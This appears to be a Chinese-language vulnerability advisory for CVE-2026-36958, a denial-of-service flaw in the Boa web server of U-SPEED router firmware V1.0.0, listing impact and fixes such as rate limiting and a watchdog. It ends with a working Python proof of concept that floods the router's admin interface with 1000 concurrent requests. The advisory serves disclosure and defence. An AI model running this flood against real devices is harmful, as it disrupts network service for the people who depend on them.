# CVE-2026-36958: 并发 HTTP 请求导致的拒绝服务漏洞 ## 漏洞概述 * **漏洞编号**: CVE-2026-36958 * **CVSS 评分**: 7.5 (High) * **漏洞类型**: CWE-400 - 不受控的资源消耗 (Denial of Service) * **受影响产品**: U-SPEED Router Firmware V1.0.0 * **漏洞描述**: U-SPEED 路由器固件 V1.0.0 存在拒绝服务漏洞。攻击者可通过向 Web 管理界面的随机或不存在的端点发送大量并发 HTTP 请求,耗尽嵌入式 Boa HTTP 服务器的系统资源,导致 Web 界面无响应,甚至需要手动重启才能恢复。 ## 影响范围 * Web 管理界面变得不可用。 * 可能导致路由服务中断。 * 需要手动重启路由器才能恢复功能。 ## 修复方案 * 在 Boa Web 服务器上实施连接速率限制。 * 限制每个源 IP 的最大并发连接数。 * 添加自动恢复/看门狗机制。 ## 概念验证代码 (POC) ```python import requests import threading TARGET = "http://192.168.10.1" def flood(i): try: requests.get(f"{TARGET}/random_endpoint_{i}", timeout=2) except: pass threads = [] for i in range(1000): t = threading.Thread(target=flood, args=(i,)) threads.append(t) t.start() for t in threads: t.join() print("Done. Check if router web interface is still responsive.") ```